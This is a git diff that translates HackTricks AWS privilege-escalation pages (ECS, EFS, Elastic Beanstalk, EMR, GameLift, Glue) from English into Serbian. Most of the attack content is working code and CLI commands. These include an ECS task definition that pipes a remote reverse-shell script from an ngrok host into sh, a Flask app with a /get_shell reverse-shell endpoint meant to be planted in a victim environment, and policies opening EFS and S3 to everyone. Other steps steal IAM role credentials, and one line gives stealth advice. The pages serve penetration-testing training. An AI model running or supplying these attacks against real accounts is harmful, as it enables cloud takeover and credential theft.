-    --cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
-    --launch-type EC2
+--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
+--launch-type EC2
 
 # You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
 ```
-
 ### `ecs:ExecuteCommand`, `ecs:DescribeTasks,`**`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`**
 
-An attacker with the **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** can **execute commands** inside a running container and exfiltrate the IAM role attached to it (you need the describe permissions because it's necessary to run `aws ecs execute-command`).\
-However, in order to do that, the container instance need to be running the **ExecuteCommand agent** (which by default isn't).
+Napadač sa **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** može **izvršavati komande** unutar pokrenutog kontejnera i eksfiltrirati IAM ulogu koja je povezana sa njim (potrebna su prava za opis jer je neophodno pokrenuti `aws ecs execute-command`).\
+Međutim, da bi to uradio, instanca kontejnera mora da pokreće **ExecuteCommand agent** (što po defaultu nije slučaj).
 
-Therefore, the attacker cloud try to:
-
-- **Try to run a command** in every running container
+Stoga, napadač može pokušati da:
 
+- **Pokuša da izvrši komandu** u svakom pokrenutom kontejneru
 ```bash
 # List enableExecuteCommand on each task
 for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
-   echo "Cluster $cluster"
-   for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
-      echo "  Task $task"
-      # If true, it's your lucky day
-      aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
-   done
+echo "Cluster $cluster"
+for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
+echo "  Task $task"
+# If true, it's your lucky day
+aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
+done
 done
 
 # Execute a shell in a container
 aws ecs execute-command --interactive \
-   --command "sh" \
-   --cluster "$CLUSTER_ARN" \
-   --task "$TASK_ARN"
+--command "sh" \
+--cluster "$CLUSTER_ARN" \
+--task "$TASK_ARN"
 ```
+- Ako ima **`ecs:RunTask`**, pokrenite zadatak sa `aws ecs run-task --enable-execute-command [...]`
+- Ako ima **`ecs:StartTask`**, pokrenite zadatak sa `aws ecs start-task --enable-execute-command [...]`
+- Ako ima **`ecs:CreateService`**, kreirajte servis sa `aws ecs create-service --enable-execute-command [...]`
+- Ako ima **`ecs:UpdateService`**, ažurirajte servis sa `aws ecs update-service --enable-execute-command [...]`
 
-- If he has **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]`
-- If he has **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]`
-- If he has **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]`
-- If he has **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]`
+Možete pronaći **primere tih opcija** u **prethodnim ECS privesc sekcijama**.
 
-You can find **examples of those options** in **previous ECS privesc sections**.
-
-**Potential Impact:** Privesc to a different role attached to containers.
+**Potencijalni uticaj:** Privesc na drugu ulogu vezanu za kontejnere.
 
 ### `ssm:StartSession`
 
-Check in the **ssm privesc page** how you can abuse this permission to **privesc to ECS**:
+Proverite na **ssm privesc stranici** kako možete zloupotrebiti ovu dozvolu za **privesc na ECS**:
 
 {{#ref}}
 aws-ssm-privesc.md
@@ -198,7 +186,7 @@ aws-ssm-privesc.md
 
 ### `iam:PassRole`, `ec2:RunInstances`
 
-Check in the **ec2 privesc page** how you can abuse these permissions to **privesc to ECS**:
+Proverite na **ec2 privesc stranici** kako možete zloupotrebiti ove dozvole za **privesc na ECS**:
 
 {{#ref}}
 aws-ec2-privesc.md
@@ -206,30 +194,29 @@ aws-ec2-privesc.md
 
 ### `?ecs:RegisterContainerInstance`
 
-TODO: Is it possible to register an instance from a different AWS account so tasks are run under machines controlled by the attacker??
+TODO: Da li je moguće registrovati instancu iz drugog AWS naloga tako da se zadaci pokreću na mašinama koje kontroliše napadač??
 
 ### `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets`
 
 > [!NOTE]
-> TODO: Test this
-
-An attacker with the permissions `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, and `ecs:DescribeTaskSets` can **create a malicious task set for an existing ECS service and update the primary task set**. This allows the attacker to **execute arbitrary code within the service**.
+> TODO: Testirajte ovo
 
+Napadač sa dozvolama `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, i `ecs:DescribeTaskSets` može **kreirati zloćudni set zadataka za postojeći ECS servis i ažurirati primarni set zadataka**. Ovo omogućava napadaču da **izvrši proizvoljan kod unutar servisa**.
 ```bash
 bashCopy code# Register a task definition with a reverse shell
 echo '{
-  "family": "malicious-task",
-  "containerDefinitions": [
-    {
-      "name": "malicious-container",
-      "image": "alpine",
-      "command": [
-        "sh",
-        "-c",
-        "apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
-      ]
-    }
-  ]
+"family": "malicious-task",
+"containerDefinitions": [
+{
+"name": "malicious-container",
+"image": "alpine",
+"command": [
+"sh",
+"-c",
+"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
+]
+}
+]
 }' > malicious-task-definition.json
 
 aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json
@@ -240,15 +227,10 @@ aws ecs create-task-set --cluster existing-cluster --service existing-service --
 # Update the primary task set for the service
 aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
 ```
+**Potencijalni uticaj**: Izvršavanje proizvoljnog koda u pogođenoj usluzi, što može uticati na njenu funkcionalnost ili eksfiltrirati osetljive podatke.
 
-**Potential Impact**: Execute arbitrary code in the affected service, potentially impacting its functionality or exfiltrating sensitive data.
-
-## References
+## Reference
 
 - [https://ruse.tech/blogs/ecs-attack-methods](https://ruse.tech/blogs/ecs-attack-methods)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md
index 8a54b28d8..a66863140 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md
@@ -4,97 +4,83 @@
 
 ## EFS
 
-More **info about EFS** in:
+Više **informacija o EFS** u:
 
 {{#ref}}
 ../aws-services/aws-efs-enum.md
 {{#endref}}
 
-Remember that in order to mount an EFS you need to be in a subnetwork where the EFS is exposed and have access to it (security groups). Is this is happening, by default, you will always be able to mount it, however, if it's protected by IAM policies you need to have the extra permissions mentioned here to access it.
+Zapamtite da da biste montirali EFS, morate biti u podmreži gde je EFS izložen i imati pristup njemu (grupe bezbednosti). Ako se to dešava, po defaultu, uvek ćete moći da ga montirate, međutim, ako je zaštićen IAM politikama, potrebno je da imate dodatne dozvole navedene ovde da biste mu pristupili.
 
 ### `elasticfilesystem:DeleteFileSystemPolicy`|`elasticfilesystem:PutFileSystemPolicy`
 
-With any of those permissions an attacker can **change the file system policy** to **give you access** to it, or to just **delete it** so the **default access** is granted.
-
-To delete the policy:
+Sa bilo kojom od tih dozvola, napadač može **promeniti politiku datotečnog sistema** da **omogući pristup** njemu, ili samo **izbrisati** tako da se **default pristup** dodeli.
 
+Da biste izbrisali politiku:
 ```bash
 aws efs delete-file-system-policy \
-    --file-system-id 
+--file-system-id 
 ```
-
-To change it:
-
+Da biste to promenili:
 ```json
 aws efs put-file-system-policy --file-system-id  --policy file:///tmp/policy.json
 
 // Give everyone trying to mount it read, write and root access
 // policy.json:
 {
-    "Version": "2012-10-17",
-    "Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
-    "Statement": [
-        {
-            "Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "*"
-            },
-            "Action": [
-	       "elasticfilesystem:ClientRootAccess",
-               "elasticfilesystem:ClientWrite",
-               "elasticfilesystem:ClientMount"
-            ],
-            "Condition": {
-                "Bool": {
-                    "elasticfilesystem:AccessedViaMountTarget": "true"
-                }
-            }
-        }
-    ]
+"Version": "2012-10-17",
+"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
+"Statement": [
+{
+"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": [
+"elasticfilesystem:ClientRootAccess",
+"elasticfilesystem:ClientWrite",
+"elasticfilesystem:ClientMount"
+],
+"Condition": {
+"Bool": {
+"elasticfilesystem:AccessedViaMountTarget": "true"
+}
+}
+}
+]
 }
 ```
-
 ### `elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)`
 
-With this permission an attacker will be able to **mount the EFS**. If the write permission is not given by default to everyone that can mount the EFS, he will have only **read access**.
-
+Sa ovom dozvolom, napadač će moći da **montira EFS**. Ako dozvola za pisanje nije data podrazumevano svima koji mogu da montiraju EFS, imaće samo **pristup za čitanje**.
 ```bash
 sudo mkdir /efs
 sudo mount -t efs -o tls,iam  :/ /efs/
 ```
+Dodatne dozvole `elasticfilesystem:ClientRootAccess` i `elasticfilesystem:ClientWrite` mogu se koristiti za **pisanje** unutar datotečnog sistema nakon što je montiran i za **pristup** tom datotečnom sistemu **kao root**.
 
-The extra permissions`elasticfilesystem:ClientRootAccess` and `elasticfilesystem:ClientWrite` can be used to **write** inside the filesystem after it's mounted and to **access** that file system **as root**.
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the file system.
+**Potencijalni uticaj:** Indirektno privesc pronalaženjem osetljivih informacija u datotečnom sistemu.
 
 ### `elasticfilesystem:CreateMountTarget`
 
-If you an attacker is inside a **subnetwork** where **no mount target** of the EFS exists. He could just **create one in his subnet** with this privilege:
-
+Ako je napadač unutar **podmreže** gde **nema mount target** EFS-a. On bi mogao jednostavno **da kreira jedan u svojoj podmreži** sa ovom privilegijom:
 ```bash
 # You need to indicate security groups that will grant the user access to port 2049
 aws efs create-mount-target --file-system-id  \
-    --subnet-id  \
-    --security-groups 
+--subnet-id  \
+--security-groups 
 ```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the file system.
+**Potencijalni uticaj:** Indirektno privesc pronalaženjem osetljivih informacija u fajl sistemu.
 
 ### `elasticfilesystem:ModifyMountTargetSecurityGroups`
 
-In a scenario where an attacker finds that the EFS has mount target in his subnetwork but **no security group is allowing the traffic**, he could just **change that modifying the selected security groups**:
-
+U scenariju gde napadač otkrije da EFS ima mount target u njegovoj podmreži, ali **nema sigurnosne grupe koja dozvoljava saobraćaj**, mogao bi jednostavno **promeniti to modifikovanjem odabranih sigurnosnih grupa**:
 ```bash
 aws efs modify-mount-target-security-groups \
-    --mount-target-id  \
-    --security-groups 
+--mount-target-id  \
+--security-groups 
 ```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the file system.
+**Potencijalni uticaj:** Indirektno eskaliranje privilegija pronalaženjem osetljivih informacija u fajl sistemu.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md
index 613dd3a47..7509d0551 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md
@@ -4,19 +4,18 @@
 
 ## Elastic Beanstalk
 
-More **info about Elastic Beanstalk** in:
+Više **informacija o Elastic Beanstalk** u:
 
 {{#ref}}
 ../aws-services/aws-elastic-beanstalk-enum.md
 {{#endref}}
 
 > [!WARNING]
-> In order to perform sensitive actions in Beanstalk you will need to have a **lot of sensitive permissions in a lot of different services**. You can check for example the permissions given to **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`**
+> Da biste izvršili osetljive radnje u Beanstalk-u, biće vam potrebne **mnoge osetljive dozvole u mnogim različitim servisima**. Možete proveriti, na primer, dozvole koje su date **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`**
 
-### `elasticbeanstalk:RebuildEnvironment`, S3 write permissions & many others
-
-With **write permissions over the S3 bucket** containing the **code** of the environment and permissions to **rebuild** the application (it's needed `elasticbeanstalk:RebuildEnvironment` and a few more related to `S3` , `EC2` and `Cloudformation`), you can **modify** the **code**, **rebuild** the app and the next time you access the app it will **execute your new code**, allowing the attacker to compromise the application and the IAM role credentials of it.
+### `elasticbeanstalk:RebuildEnvironment`, S3 dozvole za pisanje i mnoge druge
 
+Sa **dozvolama za pisanje nad S3 bucket-om** koji sadrži **kod** okruženja i dozvolama za **ponovno izgradnju** aplikacije (potrebno je `elasticbeanstalk:RebuildEnvironment` i još nekoliko povezanih sa `S3`, `EC2` i `Cloudformation`), možete **modifikovati** **kod**, **ponovo izgraditi** aplikaciju i sledeći put kada pristupite aplikaciji, ona će **izvršiti vaš novi kod**, omogućavajući napadaču da kompromituje aplikaciju i IAM uloge njene kredencijale.
 ```bash
 # Create folder
 mkdir elasticbeanstalk-eu-west-1-947247140022
@@ -31,56 +30,42 @@ aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247
 # Rebuild env
 aws elasticbeanstalk rebuild-environment --environment-name "env-name"
 ```
+### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, i još...
 
-### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more...
-
-The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling`** and **`elasticloadbalancing`** permissions are the necessary to create a raw Elastic Beanstalk scenario from scratch.
-
-- Create an AWS Elastic Beanstalk application:
+Pomenute, plus nekoliko **`S3`**, **`EC2`, `cloudformation`**, **`autoscaling`** i **`elasticloadbalancing`** dozvola su neophodne za kreiranje osnovnog Elastic Beanstalk scenarija od nule.
 
+- Kreirajte AWS Elastic Beanstalk aplikaciju:
 ```bash
 aws elasticbeanstalk create-application --application-name MyApp
 ```
-
-- Create an AWS Elastic Beanstalk environment ([**supported platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)):
-
+- Kreirajte AWS Elastic Beanstalk okruženje ([**podržane platforme**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)):
 ```bash
 aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role
 ```
+Ako je okruženje već kreirano i **ne želite da kreirate novo**, možete jednostavno **ažurirati** postojeće.
 
-If an environment is already created and you **don't want to create a new one**, you could just **update** the existent one.
-
-- Package your application code and dependencies into a ZIP file:
-
+- Pakujte svoj aplikacioni kod i zavisnosti u ZIP datoteku:
 ```python
 zip -r MyApp.zip .
 ```
-
-- Upload the ZIP file to an S3 bucket:
-
+- Učitajte ZIP datoteku u S3 kantu:
 ```python
 aws s3 cp MyApp.zip s3://elasticbeanstalk--/MyApp.zip
 ```
-
-- Create an AWS Elastic Beanstalk application version:
-
+- Kreirajte verziju aplikacije AWS Elastic Beanstalk:
 ```css
 aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk--",S3Key="MyApp.zip"
 ```
-
-- Deploy the application version to your AWS Elastic Beanstalk environment:
-
+- Implementirajte verziju aplikacije u vaše AWS Elastic Beanstalk okruženje:
 ```bash
 aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
 ```
-
 ### `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `cloudformation:GetTemplate`, `cloudformation:DescribeStackResources`, `cloudformation:DescribeStackResource`, `autoscaling:DescribeAutoScalingGroups`, `autoscaling:SuspendProcesses`, `autoscaling:SuspendProcesses`
 
-First of all you need to create a **legit Beanstalk environment** with the **code** you would like to run in the **victim** following the **previous steps**. Potentially a simple **zip** containing these **2 files**:
+Prvo što treba da uradite je da kreirate **legitiman Beanstalk okruženje** sa **kodom** koji želite da pokrenete u **žrtvi** prateći **prethodne korake**. Potencijalno jednostavan **zip** koji sadrži ova **2 fajla**:
 
 {{#tabs }}
 {{#tab name="application.py" }}
-
 ```python
 from flask import Flask, request, jsonify
 import subprocess,os, socket
@@ -89,34 +74,32 @@ application = Flask(__name__)
 
 @application.errorhandler(404)
 def page_not_found(e):
-        return jsonify('404')
+return jsonify('404')
 
 @application.route("/")
 def index():
-        return jsonify('Welcome!')
+return jsonify('Welcome!')
 
 
 @application.route("/get_shell")
 def search():
-        host=request.args.get('host')
-        port=request.args.get('port')
-        if host and port:
-            s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-            s.connect((host,int(port)))
-            os.dup2(s.fileno(),0)
-            os.dup2(s.fileno(),1)
-            os.dup2(s.fileno(),2)
-            p=subprocess.call(["/bin/sh","-i"])
-        return jsonify('done')
+host=request.args.get('host')
+port=request.args.get('port')
+if host and port:
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect((host,int(port)))
+os.dup2(s.fileno(),0)
+os.dup2(s.fileno(),1)
+os.dup2(s.fileno(),2)
+p=subprocess.call(["/bin/sh","-i"])
+return jsonify('done')
 
 if __name__=="__main__":
-    application.run()
+application.run()
 ```
-
 {{#endtab }}
 
 {{#tab name="requirements.txt" }}
-
 ```
 click==7.1.2
 Flask==1.1.2
@@ -125,44 +108,42 @@ Jinja2==2.11.3
 MarkupSafe==1.1.1
 Werkzeug==1.0.1
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-Once you have **your own Beanstalk env running** your rev shell, it's time to **migrate** it to the **victims** env. To so so you need to **update the Bucket Policy** of your beanstalk S3 bucket so the **victim can access it** (Note that this will **open** the Bucket to **EVERYONE**):
-
+Kada imate **svoju Beanstalk okolinu koja radi** vašu rev shell, vreme je da je **migrate** u **žrtvinu** okolinu. Da biste to uradili, potrebno je da **ažurirate Bucket Policy** vašeg beanstalk S3 bucket-a tako da **žrtva može da mu pristupi** (Napomena: ovo će **otvoriti** Bucket za **SVE**):
 ```json
 {
-  "Version": "2008-10-17",
-  "Statement": [
-    {
-      "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": [
-        "s3:ListBucket",
-        "s3:ListBucketVersions",
-        "s3:GetObject",
-        "s3:GetObjectVersion",
-        "s3:*"
-      ],
-      "Resource": [
-        "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
-        "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
-      ]
-    },
-    {
-      "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
-      "Effect": "Deny",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": "s3:DeleteBucket",
-      "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
-    }
-  ]
+"Version": "2008-10-17",
+"Statement": [
+{
+"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": [
+"s3:ListBucket",
+"s3:ListBucketVersions",
+"s3:GetObject",
+"s3:GetObjectVersion",
+"s3:*"
+],
+"Resource": [
+"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
+"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
+]
+},
+{
+"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
+"Effect": "Deny",
+"Principal": {
+"AWS": "*"
+},
+"Action": "s3:DeleteBucket",
+"Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
+}
+]
 }
 ```
 
@@ -181,9 +162,4 @@ Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBe
 
 The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections.
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md
index 0025abe52..4f630f03e 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md
@@ -4,7 +4,7 @@
 
 ## EMR
 
-More **info about EMR** in:
+Više **informacija o EMR** u:
 
 {{#ref}}
 ../aws-services/aws-emr-enum.md
@@ -12,57 +12,51 @@ More **info about EMR** in:
 
 ### `iam:PassRole`, `elasticmapreduce:RunJobFlow`
 
-An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\
-Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`).
-
+Napadač sa ovim dozvolama može **pokrenuti novi EMR klaster povezujući EC2 uloge** i pokušati da ukrade njegove akreditive.\
+Imajte na umu da bi za to trebalo da **znate neki ssh privatni ključ uvezen u nalog** ili da uvezete jedan, i da možete da **otvorite port 22 na glavnom čvoru** (možda ćete moći to da uradite sa atributima `EmrManagedMasterSecurityGroup` i/ili `ServiceAccessSecurityGroup` unutar `--ec2-attributes`).
 ```bash
 # Import EC2 ssh key (you will need extra permissions for this)
 ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
 chmod 400 /tmp/sshkey
 base64 /tmp/sshkey.pub > /tmp/pub.key
 aws ec2 import-key-pair \
-    --key-name "privesc" \
-    --public-key-material file:///tmp/pub.key
+--key-name "privesc" \
+--public-key-material file:///tmp/pub.key
 
 
 aws emr create-cluster \
-    --release-label emr-5.15.0 \
-    --instance-type m4.large \
-    --instance-count 1 \
-    --service-role EMR_DefaultRole \
-    --ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc
+--release-label emr-5.15.0 \
+--instance-type m4.large \
+--instance-count 1 \
+--service-role EMR_DefaultRole \
+--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc
 
 # Wait 1min and connect via ssh to an EC2 instance of the cluster)
 aws emr describe-cluster --cluster-id 
 # In MasterPublicDnsName you can find the DNS to connect to the master instance
 ## You cna also get this info listing EC2 instances
 ```
+Napomena kako je **EMR uloga** specificirana u `--service-role` i **ec2 uloga** je specificirana u `--ec2-attributes` unutar `InstanceProfile`. Međutim, ova tehnika omogućava samo krađu EC2 uloge akreditiva (jer ćete se povezati putem ssh), ali ne i EMR IAM uloge.
 
-Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role.
-
-**Potential Impact:** Privesc to the EC2 service role specified.
+**Potencijalni uticaj:** Privesc na EC2 servisnu ulogu koja je specificirana.
 
 ### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole`
 
-With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role.
+Sa ovim dozvolama, napadač može otići na **AWS konzolu**, kreirati Notebook i pristupiti mu da ukrade IAM ulogu.
 
 > [!CAUTION]
-> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related.
+> Čak i ako prikačite IAM ulogu na instancu notebook-a, u mojim testovima sam primetio da sam mogao da ukradem AWS upravljane akreditive, a ne akreditive povezane sa IAM ulogom.
 
-**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
+**Potencijalni uticaj:** Privesc na AWS upravljanu ulogu arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
 
 ### `elasticmapreduce:OpenEditorInConsole`
 
-Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\
-The URL of the notebook is `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/`
+Samo sa ovom dozvolom, napadač će moći da pristupi **Jupyter Notebook-u i ukrade IAM ulogu** koja mu je povezana.\
+URL notebook-a je `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/`
 
 > [!CAUTION]
-> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related
+> Čak i ako prikačite IAM ulogu na instancu notebook-a, u mojim testovima sam primetio da sam mogao da ukradem AWS upravljane akreditive, a ne akreditive povezane sa IAM ulogom.
 
-**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
+**Potencijalni uticaj:** Privesc na AWS upravljanu ulogu arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md
index b40cdf413..b47b56fdd 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md
@@ -4,19 +4,13 @@
 
 ### `gamelift:RequestUploadCredentials`
 
-With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**.
-
+Sa ovom dozvolom, napadač može da dobije **novi set kredencijala za korišćenje prilikom otpremanja** novog skupa datoteka za izgradnju igre na Amazon GameLift-ov Amazon S3. Vraća **S3 kredencijale za otpremanje**.
 ```bash
 aws gamelift request-upload-credentials \
-    --build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111
+--build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111
 ```
-
 ## References
 
 - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md
index 049d3b273..695531aa5 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md
@@ -6,15 +6,14 @@
 
 ### `iam:PassRole`, `glue:CreateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)
 
-Users with these permissions can **set up a new AWS Glue development endpoint**, **assigning an existing service role assumable by Glue** with specific permissions to this endpoint.
-
-After the setup, the **attacker can SSH into the endpoint's instance**, and steal the IAM credentials of the assigned role:
+Korisnici sa ovim dozvolama mogu **postaviti novu AWS Glue razvojnu tačku**, **dodeljujući postojeću servisnu ulogu koju Glue može preuzeti** sa specifičnim dozvolama ovoj tački.
 
+Nakon postavljanja, **napadač može SSH-ovati u instancu tačke**, i ukrasti IAM akreditive dodeljene uloge:
 ```bash
 # Create endpoint
 aws glue create-dev-endpoint --endpoint-name  \
-    --role-arn  \
-    --public-key file:///ssh/key.pub
+--role-arn  \
+--public-key file:///ssh/key.pub
 
 # Get the public address of the instance
 ## You could also use get-dev-endpoints
@@ -23,19 +22,17 @@ aws glue get-dev-endpoint --endpoint-name privesctest
 # SSH with the glue user
 ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com
 ```
+Za svrhe prikrivanja, preporučuje se korišćenje IAM kredencijala iznutra Glue virtuelne mašine.
 
-For stealth purpose, it's recommended to use the IAM credentials from inside the Glue virtual machine.
-
-**Potential Impact:** Privesc to the glue service role specified.
+**Potencijalni uticaj:** Privesc na ulogu servisa glue koja je navedena.
 
 ### `glue:UpdateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)
 
-Users with this permission can **alter an existing Glue development** endpoint's SSH key, **enabling SSH access to it**. This allows the attacker to execute commands with the privileges of the endpoint's attached role:
-
+Korisnici sa ovom dozvolom mogu **promeniti postojeći Glue razvojni** endpoint SSH ključ, **omogućavajući SSH pristup njemu**. Ovo omogućava napadaču da izvršava komande sa privilegijama uloge koja je povezana sa endpoint-om:
 ```bash
 # Change public key to connect
 aws glue --endpoint-name target_endpoint \
-    --public-key file:///ssh/key.pub
+--public-key file:///ssh/key.pub
 
